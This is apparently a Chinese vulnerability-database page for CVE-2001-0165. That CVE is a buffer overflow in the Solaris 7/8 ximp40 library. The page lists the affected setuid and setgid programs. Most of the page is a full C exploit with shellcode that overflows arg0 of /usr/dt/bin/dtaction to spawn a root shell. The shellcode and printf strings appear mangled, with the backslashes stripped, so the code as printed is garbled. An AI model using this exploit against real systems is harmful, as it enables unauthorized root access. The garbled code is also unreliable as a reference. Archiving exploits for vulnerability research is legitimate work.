Solaris 7和Solaris 8缓冲区溢出漏洞
漏洞ID | 1106193 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2001-01-31 | 更新时间 | 2005-10-12 |
CVE编号 | CVE-2001-0165 |
CNNVD-ID | CNNVD-200105-024 |
漏洞平台 | Solaris | CVSS评分 | 7.2 |
|漏洞来源
|漏洞详情
Solaris7和Solaris8中的ximp40共享库存在缓冲区溢出漏洞。本地用户可以借助超长”arg0″(进程名称)参数提升权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/2322/info
Solaris is a variant of the UNIX Operating System, maintained and distributed by Sun Microsystems. It is freely available, with source code available.
A problem in the ximp40 library packaged with Openwin could allow a user to gain elevated privileges. Due to a problem with the handling of input by the programs linked against ximp40.so.2, it is possible to supply a long string, approximately 272 bytes, to the arg0 of the command, which will overwrite stack variables, including the return address of the program.
This makes it possible for a malicious user with local access to the system to execute arbitrary code, and depending upon which SUID binary is exploited, gain either EUID mail, or EUID root. Programs linked against the library that have been reported as vulnerable are:
*Solaris 8
suid root : /usr/dt/bin/dtaction
suid root : /usr/dt/bin/dtprintinfo
suid root : /usr/openwin/bin/sys-suspend
sgid mail : /usr/dt/bin/dtmail
sgid mail : /usr/openwin/bin/mailtool
*Solaris 7
suid root : /usr/dt/bin/dtaction
suid root : /usr/dt/bin/dtprintinfo
suid root : /usr/dt/bin/dtappgather
suid root : /usr/bin/admintool
suid root : /usr/openwin/bin/sys-suspend
sgid mail : /usr/dt/bin/dtmail
sgid mail : /usr/openwin/bin/mailtool
/*====================================================================
Solaris ximp40 shared library exploit for Solaris8 Intel Edition
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN ([email protected])
[usage]
#xhost +targethost
#telnet targethost
...
%setenv DISPLAY yourhost:0.0
%gcc ximp40.c
%./a.out
0:Default value 1:Calculated value > 1 <- Input 0 or 1
====================================================================
*/
#include <stdio.h>
#define BUF_SIZE 272
#define EIP_OFFSET 260
#define FAKE_OFFSET 264
#define FAKE_VALUE 0x08046dec
#define EIP_VALUE 0x08047cb4
#define FAKE_VALUE_DIF 0xd9c
#define EIP_VALUE_DIF 0x12c
#define NOP 0x90
char shell_code[]=
"xebx3bx9axffxffxffxffx07xffxc3x5ex31xc0x89x46xc1"
"x88x46xc6x88x46x07x89x46x0cx31xc0x50xb0x17xe8xdf"
"xffxffxffx83xc4x04x31xc0x50x8dx5ex08x53x8dx1ex89"
"x5ex08x53xb0x3bxe8xc8xffxffxffx83xc4x0cxe8xc8xff"
"xffxffx2fx62x69x6ex2fx73x68xffxffxffxffxffxffxff"
"xffxff";
unsigned long get_sp(void)
{
__asm__(" movl %esp,%eax ");
}
void valset(char *p,unsigned int val)
{
*p=val&0xff;
*(p+1)=(val>>8)&0xff;
*(p+2)=(val>>16)&0xff;
*(p+3)=(val>>24)&0xff;
}
main()
{
char buf[BUF_SIZE];
unsigned int esp=get_sp(),sw;
memset(buf,NOP,BUF_SIZE);
memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code,
strlen(shell_code));
printf("esp=%xn",esp);
printf("0:Default value 1:Calculated value >");
fflush(stdout);
scanf("%d",&sw);
if (sw==0){
valset(buf+FAKE_OFFSET, FAKE_VALUE);
valset(buf+EIP_OFFSET , EIP_VALUE);
printf("Jumping address = %xn",EIP_VALUE);
}else{
valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF);
valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF);
printf("Jumping address = %xn",esp+EIP_VALUE_DIF);
}
buf[BUF_SIZE-1]=0;
execl("/usr/dt/bin/dtaction",buf,NULL);
}
|参考资料
来源:XF
名称:solaris-ximp40-bo
链接:http://xforce.iss.net/static/6039.php
来源:BID
名称:2322
链接:http://www.securityfocus.com/bid/2322
来源:BUGTRAQ
名称:20010131[SPSadvisory#40]Solaris7/8ximp40sharedlibrarybufferoverflow
链接:http://archives.neohapsis.com/archives/bugtraq/2001-01/0517.html
相关推荐: Cisco IOS/700 Router Password Buffer Overflow
Cisco IOS/700 Router Password Buffer Overflow 漏洞ID 1104986 漏洞类型 Boundary Condition Error 发布时间 1997-12-15 更新时间 1997-12-15 CVE编号 N/A…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666